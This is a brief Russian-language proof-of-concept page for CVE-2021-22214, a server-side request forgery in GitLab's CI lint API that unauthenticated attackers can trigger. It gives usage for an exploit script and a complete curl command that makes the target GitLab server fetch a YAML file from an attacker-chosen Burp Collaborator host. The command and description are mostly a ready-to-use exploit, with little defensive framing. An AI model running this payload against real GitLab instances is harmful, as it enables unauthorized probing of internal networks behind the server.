
Эксплойт-доказательство концепции для CVE-2021-22214 — межсерверной подделки запросов (SSRF) в вебхуках GitLab, позволяющей неаутентифицированным злоумышленникам выполнять внутренние HTTP-запросы.
POC для CVE-2021-22214: Gitlab SSRF
Установленный GitLab содержит уязвимость Server-side request forgery (SSRF) в результате включения внутренней сети для вебхуков. Удалённый неаутентифицированный злоумышленник может использовать GitLab-инстанс с ограниченной регистрацией, заставляя его отправлять HTTP-запросы на произвольный домен по выбору злоумышленника.
usage: python3 GitLab_SSRF.py <target> <burp_collaborator_url>
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}'